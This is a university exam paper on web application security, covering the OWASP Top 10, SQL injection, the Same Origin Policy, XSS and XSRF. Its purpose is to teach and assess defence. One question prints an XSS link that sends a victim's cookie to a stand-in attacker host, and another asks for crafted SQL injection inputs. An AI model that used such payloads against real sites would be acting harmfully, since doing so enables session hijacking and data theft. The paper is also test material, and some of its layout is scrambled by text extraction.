Add to collection(s) Add to saved
  1. Engineering & Technology
  2. Computer Science
  3. Databases

BSc (Hons) Web Technologies Examinations for 2013 – 2014

advertisement 
BSc (Hons) Web Technologies
Cohort: BWT/11/FT
Examinations for 2013 – 2014/ Semester 2
MODULE: ADVANCED WEB TECHNOLOGIES
MODULE CODE: SECU3107C
Duration: 3 Hours
Instructions to Candidates:
1. Answer ALL questions.
2. Questions may be answered in any order but your answers must show
the Question number clearly.
3. Questions carry equal marks
4. Always start a new question on a fresh page.
5. Total marks to be scored 100.
This Question Paper contains 4 questions and 5 pages.
Page 1 of 5
Advanced Web Technologies (SECU 3107C)
SITE/VK 2013-2014 S2
ANSWER ALL QUESTIONS
QUESTION 1: (25 MARKS)
(a) Briefly describe any two out of the Top 10 OWASP web application
security risk for 2013.
(4 marks)
(b) Currently, hackers are attempting to attack client software instead of
server software. Explain why?
(c)
(3 marks)
What is a regression bug? Give two instances when regression bugs
are most likely to occur.
(2
+
marks)
(d)
Give three reasons why security vulnerabilities are expensive to fix.
(6 marks)
(e) Briefly discuss three secure design principles.
(6 marks)
QUESTION 2: (25 MARKS)
(a) Briefly explain the SQL Injection attacks?
(3 marks)
(b) Given the following SQL statement:
SELECT email, passwd, login_id, full_name
FROM Members
WHERE email = '$EMAIL';
Which crafted input in the email field, would allow an attacker to
i.
view every item in the Members database?
(5 marks)
ii.
delete the table Members from the database?
(5 marks)
Explain your answers.
Page 2 of 5
Advanced Web Technologies (SECU 3107C)
SITE/VK 2013-2014 S2
4
(c)
To mount an SQL injection attack, often the attacker needs to know
table names from the web application's database.
i.
ii.
(d)
Two
How does attacker attempts to learn such information about the
database?
(2 marks)
Describe two ways of how can this be prevented?
(4 marks)
approaches
of
preventing
SQL
injection
attacks
are
Blacklisting and Whitelisting. Which of these two approaches are
more effective? Justify your answer.
(6 marks)
QUESTION 3: (25 MARKS)
(a) What is the security provided by the "Same Origin Policy" in web
browsers?
(2 marks)
(b) Consider the following URL: http://www.utm.ac.mu/courses/
Mention whether the four URL below are of the same origin as the
above URL
(c)
i.
ftp://www.utm.ac.mu/timetable/
ii.
http:// www.utm.ac.mu/timetable/
iii.
http:// www.utm.mu/programmes/
iv.
http://www.utm.ac.mu:82/courses/
(4 marks)
Same Origin Policy allows scripts (<script>) to be loaded from other
origins and executed in the context of the actual application. Give
examples of two other tags involved in cross-origin communications
allowed by the browser?
(d)
(2 marks)
How can an attacker find out whether a web application is vulnerable
to XSS attacks?
(4 marks)
Page 3 of 5
Advanced Web Technologies (SECU 3107C)
SITE/VK 2013-2014 S2
(e)
Consider the following link from a malicious web site:
<a href="http://www.mcb.com/search?searchTerm
=<script>document.location='http://www.badguy.com/'
+document.cookie;</script>">Click Here to Win Rs 1000 </a>
Assume that the web site is vulnerable to XSS attack.
i.
What will happen when a user clicks on the link?
(6 marks)
ii.
HREF destination is displayed when mouse hover over link.
How can attackers disguise link such that the victim user (3 marks)
does not suspect the attack?
(f)
There are two types of XSS: reflected XSS and stored XSS. Which
attack affects many users? Explain why.
(4 marks)
QUESTION 4: (25 MARKS)
(a) Cookies are divided into two classes with respect to how long they
are cached by the browser. Briefly describe these two classes of
cookies and their storage.
(6 marks)
(b) Alice is reading from a News web site.
She opens another tab and logs into her online library application
using HTTP authentication. She searches for some books and then
closes the tab.
She then resumes reading some article from the News web site.
Finally, she opens a web site from www.bad.com.
If the www.bad.com website attempts to send a XSRF request to the
online library application, will the forged request from Alice's browser
Page 4 of 5
Advanced Web Technologies (SECU 3107C)
SITE/VK 2013-2014 S2
be able to perform some trusted action? Justify your answer.
(4 marks)
(c)
Can SSL prevent XSRF? Why?
(3 marks)
(d)
One way to prevent XSRF is for the server to inspect the Referrer
Header of the request.
i.
How could this approach prevent XSRF?
(4 marks)
ii.
Discuss the effectiveness of this approach
(4 marks)
iii.
Briefly describe a more effective protection against XSRF.
(4 marks)
***END OF QUESTION PAPER***
Page 5 of 5
Advanced Web Technologies (SECU 3107C)
SITE/VK 2013-2014 S2
Related documents
Quiz-Input/Output/Processing
Quiz-Input/Output/Processing
Example Biological Level of Analysis Test
Example Biological Level of Analysis Test
ADVANCED LEVEL IN ECONOMICS FIRST YEAR Market
ADVANCED LEVEL IN ECONOMICS FIRST YEAR Market
I ) Match the following words with their correct meanings :
I ) Match the following words with their correct meanings :
Business Portfolio Assignment
Business Portfolio Assignment
Unit 1: Square Root – PRETEST
Unit 1: Square Root – PRETEST
Explain how human activities on a floodplain can increase the
Explain how human activities on a floodplain can increase the
Linear system culminating
Linear system culminating
Chapter 9 – Solution Chemistry
Chapter 9 – Solution Chemistry
Drawing a Cubist portrait in coloured pencil
Drawing a Cubist portrait in coloured pencil
Download
advertisement